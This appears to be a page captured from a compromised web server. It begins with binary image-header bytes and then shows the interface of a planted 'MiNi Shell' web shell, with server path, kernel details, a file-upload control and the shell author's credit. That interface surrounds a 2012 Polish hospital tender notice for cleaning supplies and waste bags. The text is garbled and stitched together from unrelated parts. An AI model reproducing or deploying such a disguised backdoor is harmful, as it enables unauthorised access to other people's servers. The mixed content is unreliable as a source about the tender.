JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120228/47145-N-2012.html

<p class="kh_header"><b>Lubartów: Dostawy środków czystości</b><br>
<b>Numer ogłoszenia: 47145 - 2012; data zamieszczenia: 28.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul.  Cicha 14, 21-100 Lubartów, woj. lubelskie, tel. 81 855 66 08, faks 81 855 66 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz-lubartow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy środków czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowią dostawy środków czystości w ilości i asortymencie wyszczególnionym  	w Formularzu cenowym - Formularzu ofertowym stanowiącym Załącznik   nr  1  do SIWZ w podziale 	na 3 zadania.
2.	Wspólny Słownik Zamówień (CPV) : 39800000-0  środki czystości; 19520000-7  produkty 	z 	tworzyw sztucznych;   39831000-6  preparaty piorące;
3.	Dopuszcza się składanie ofert częściowych (3 zadania). Nie dopuszcza się składania ofert 				równoważnych.
4.	Każde opakowanie powinno zawierać  etykietę zawierającą następujące dane: nazwę  				produktu, termin ważności, masę netto, warunki przechowywania, nazwę i adres producenta.
5.	Zamawiający wymaga aby termin ważności przedmiotu zamówienia wynosił min. 12 miesięcy, od 			daty dostarczenia przedmiotu zamówienia do Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 19.52.00.00-7, 39.83.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania uprawnień do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień na podstawie  złożonego  oświadczenia (Załącznik Nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia  na podstawie przedstawionego oświadczenia (Załącznik Nr 2 do SIWZ) lub pisemnego zobowiązania innych podmiotów do brania czynnego udziału przy realizacji części niniejszego zamówienia oraz oświadczenia, że Wykonawca polega na doświadczeniu innych podmiotów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia na podstawie przedstawionego oświadczenia (Załącznik Nr 2 do SIWZ) lub pisemnego zobowiązania innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia na podstawie przedstawionego oświadczenia (Załącznik Nr 2 do SIWZ) lub pisemnego zobowiązania innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek sytuacji ekonomicznej i finansowej na podstawie przedstawionego oświadczenia (Załącznik Nr 2 do SIWZ) lub pisemnego oświadczenia innych podmiotów o przekazaniu ich zasobów finansowych do dyspozycji Wykonawcy, na okres realizacji niniejszego zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że oferowany asortyment posiada świadectwa dopuszczenia do obrotu na terenie RP i na każde wezwanie Wykonawca dostarczy Zamawiającemu te dokumenty, jak też karty charakteryatyki.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące przesłanki do zmiany warunków zawartej umowy:
1.W przypadku zmiany stawki podatku VAT w trakcie trwania umowy dopuszcza się zmianę wartości umowy o różnicę wynikającą ze zmiany wartości podatku VAT. Taka zmiana może nastąpić po zaakceptowaniu przez Zamawiającego wniosku Wykonawcy zawierającego uzasadnienie faktyczne i  prawne.
2.W przypadku zmiany technologii produkcji lub w przypadku zaistnienia innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca odpowiednio ją obniży.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz-lubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie ul. Cicha 14, 21-100 Lubartów, Skekcja Zamówień Publicznych i Zaopatrzenia, pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie ul. Cicha 14, 21-100 Lubartów, Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Różne środki czystości..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.
Środek do wszystkich  wodoodpornych podłóg (lastriko, PCV, terakota) , myjący i konserwujący, tworzący  powłokę ochronną, o przyjemnym zapachu, nie zawierający mydła, ph  7 - 9,0, opakowanie 1 l.

szt.

1680

2.
Środek do urządzeń sanitarnych na bazie kwasu do gruntownego czyszczenia urządzeń sanitarnych, nie niszczący powierzchni, usuwający kamień i rdzę, ph 1-1,5, opakowanie 1 l

szt.

1440


3.
Środek do mycia wszystkich powierzchni zmywalnych takich jak szkło, lustra, kafelki powierzchnie sztuczne, na bazie alkoholu, nie barwiący powierzchni,  o przyjemnym świeżym zapachu, nie pozostawiający smug, ph konc. 7-9,0, opakowanie 1 l.

szt.

1080
4.
Środek do szorowania powierzchni, silnie wybielający, o strukturze proszku, typu IZO, opakowanie 0,5 kg.
szt.
1560

5.
Wydajny płyn do ręcznego mycia  naczyń, sztućców i urządzeń kuchennych o przyjemnym zapachu, ph 7, opakowanie 1 l
szt.
1740


6.
Środek myjąco- dezynfekujący, przeznaczony dla gastronomii, działający bakteriobójczo przeciwko patogennym organizmom występującym w gastronomii: np. Salmonelli, gronkowcom, działający przeciwko grzybom, posiadający silne działanie myjące, oparty na składnikach naturalnych, nie zawierający barwników ani środków zapachowych, typu SIRAFAN, opakowanie 5 l.


op.


3
7
Środek do maszynowego mycia naczyń w formie tabletek, z których każda zapakowana jest osobno.
szt.
1500

8
Mydło w płynie do rąk i do ciała, o ph 5,5-6,5, posiadające kartę charakterystyki dla preparatu chemicznego, zawierające pochodną gliceryny, chroniące skórę przed wysuszaniem, lekko nawilżające, dobrze pieniące o przyjemnym zapachu, opakowanie 5 l.

op.

300


9
Płyn do chirurgicznego, i higienicznego mycia rąk, kombinacja łagodnych przyjaznych dla skóry aktywnie myjących substancji syntetycznych zawierające szybko działające związki powierzchniowo czynne ułatwiające mycie- zawiera składniki natłuszczające skórę, nie zawiera mydła, posiada przyjemny zapach, doskonała tolerancja w powiązaniu ze środkami do odkażania rąk na bazie alkoholu, odczyn ph 5,0, opakowanie 6 l.


op.


60

10
Ręcznik papierowy składany, jednowarstwowy, gofrowany, listki  w kolorze zielonym, długość listka 25 cm (+_1 cm), szerokość listka 23 cm (+-1 cm), 1 opakowanie zawiera 200 listków.

op.

15000

11
Papier toaletowy jumbo, szary dwuwarstwowy, gofrowany, o wymiarach: wysokość- 9cm (+-- 1cm), średnica 18 cm (+-1cm), długość 130 mb.

szt.

2400
12
Papier toaletowy szary, dwuwarstwowy, rolka tradycyjna (mała).
szt.
250

13.
Prześcieradło papierowe w rolce jednowarstwowe, gofrowane, perforowane, białe, szerokość roli 60 cm, długość roli 50 mb, , przeznaczone do gabinetów zabiegowych, lekarskich

szt.

720


14.
Pielęgnująca emulsja  do rąk, do wrażliwej i narażonej na zniszczenia skóry, dobrze wchłaniająca  się, posiadająca w swoim składzie kompozycję olejków pielęgnacyjnych regulujących wilgotność skóry, chroniąca i wygładzająca skórę, działająca odświeżająco, o wysokiej wydajności, w opakowaniu umożliwiającym zamontowanie go w dozownikach typu Silonda posiadanych przez zamawiającego, opakowanie 0,5 l.


szt.


60
15.
Golarka jednorazowego użytku, z dwoma ostrzami i paskiem nawilżającym, z nasadką zabezpieczającą ostrza.
szt.
1800


16.
Lepka mata podłogowa do umieszczania  przed blokiem operacyjnym. Zatrzymuje kurz, pyły i brud z obuwia personelu i kół wózków. Winylowe podłoże przykleja się do podłogi, pokryte akrylowym klejem, arkusze maty, usuwa się w momencie, kiedy przestają się kleić. klej zawiera środek bakteriobójczy, który niszczy bakterie. Mata składa się z 40 warstw. Rozmiar 60 cm x 115 cm.


szt.


26
17.
Pianka do golenia op. 200 ml
szt.
5

18.
Nakładka supełkowa  do stelaża ze specjalnym zaczepem umożliwiającym namaczanie i płukania nakładki w sposób bezdotykowy. Nakładka o wymiarach 13,5 x 42,5, skład  wkładki 50% poliester,  50% bawełna, wielokrotnego użytku, nadająca się do prania w temp. 95 °C, Nakładki typu Blizard

szt.

120

19.
Ściereczki do wycierania  kurzu, z mikrofazy, uniwersalne, do stosowania  na sucho i mokro, nie pozostawiające włókien na powierzchni, rozmiar 40 x 40 cm, op= 1 szt.

szt.

300

20.
Ścierka do sprzątania, koloru białego, wielokrotnego użytku, bawełniana nadająca się do prania, o wysokiej chłonności i odporności na środki chemiczne, do użycia na sucho, wilgotno i mokro, nie mechacąca się, rozmiar: 60x70 cm

szt.

240
21.
Gąbka do ręcznego mycia naczyń, prostokątna, dwuwarstwowa: miękka gąbka do zmywania i szorstka fibra do szorowania rozmiar maxi
szt.
480
22.
Opaski zaciskowe do worków na śmieci, plastikowe, pakowane po 100 sztuk.
op.
160
23.
Rękawice gospodarcze, gumowe, grube, rozmiar M, kolor żółty
para
100


24.
Środek do gruntownego czyszczenia podłóg, przeznaczony do automatu ze szczotką,  do wszystkich rodzajów podłóg, usuwa silne zabrudzenia, przyjemny zapach, nie pozostawia smug i zacieków, niskopieniący, nie wymaga spłukiwania, koncentrat 5 l.


op.


4 
25
Druciak spiralny do czyszczenia mocno zabrudzonych powierzchni, wykonany ze stali nierdzewnej.
szt.
40
26
Pasta do mycia rąk, 0,5 kg, 
szt.
60
27
Szczotka do rąk
szt.
20
28
Szczotka do zamiatania drewniana ze sztucznym włosiem +kij drewniany 
szt.
40
29
Szczotka do WC z pojemnikiem
szt.
20
30
Mop sznurkowy okrągły +kij drewniany

30
31
Ręczniki jednorazowe  w rolce 

500
32
Uchwyty do nakładek Blizard magnesowe+drążek

6
33
Płyn do maszynowego mycia podłóg -koncentrat op. 5 l.
op.
50
34
Odświeżacz do toalet ze spryskiwaczem

15
35
Płynny preparat nabłyszczający do zmywarek 1 l.
op.
10
36
Płyn do mycia pieców konwekcyjnych op. 1l
op.
4
37
Preparat do odkamieniania urządzeń kuchennych op. 1 l.
op.
5
38
Dozowniki na środek dezynfekcyjny, łokciowy, bezdotykowy
szt.
50
39
Pojemnik na papier jumbo
szt.
25
40
Podajniki na ręczniki jednorazowe 
szt.
55
41
Dozowniki na mydła, łokciowe, bezdotykowe.
szt.
55
42
Wózek do sperzatania dwu wiaderkowe 2x20 l. Z prasą.
szt.
6
43
Wiaderko z pokrywą 10 l.
szt.
10
44
Wiaderko plastikowe 10 l.
szt.
10
45
Wiaderko z wyciskarką do mopa.
szt.
5
46
Środek do czyszczenia powierzchni kuchennych tj. podłogi, ściany, blaty robocze, szafki kuchenne, maszyny i urządzenia kuchenne zawierający mydło i substancje zapachowe,  odtłuszczający. Typu - Renolit. op. 5 l.
szt.
3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 Worki na odpady..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Worki na odpady, niebieskie, odporne na rozerwanie, rozmiar 70x110cm, pakowane po 25 szt. , każdy worek oddzielnie
op.
2000  op.  po 25 szt.
2.
Worki na odpady duże czerwone, odporne na rozerwanie, rozmiar 70x110, pakowane  po 25 szt. każdy worek oddzielnie

op.
1000  op. po 25 szt.

3.
Worki na odpady, małe niebieskie, odporne na rozerwanie, rozmiar 50x60, pakowane po 50 szt. każdy  worek oddzielnie.

op.
2500  op. po 50  szt.

4.
Worki na odpady, małe czerwone, odporne na rozerwanie, rozmiar 50x60, pakowane po 50 szt. każdy  worek oddzielnie.

op.
1500 op. po  50  szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 -Środek pioracy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.

Środek piorący,  posiadający właściwości dezynfekcyjne do prania bielizny krwawej z bloku operacyjnego, traktu porodowego itp.. Wymagana technologia prania w temp. 65-80 0C, z systemem  dozowania- miarka z podziałką, opakowanie 20 kg.


op.

100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com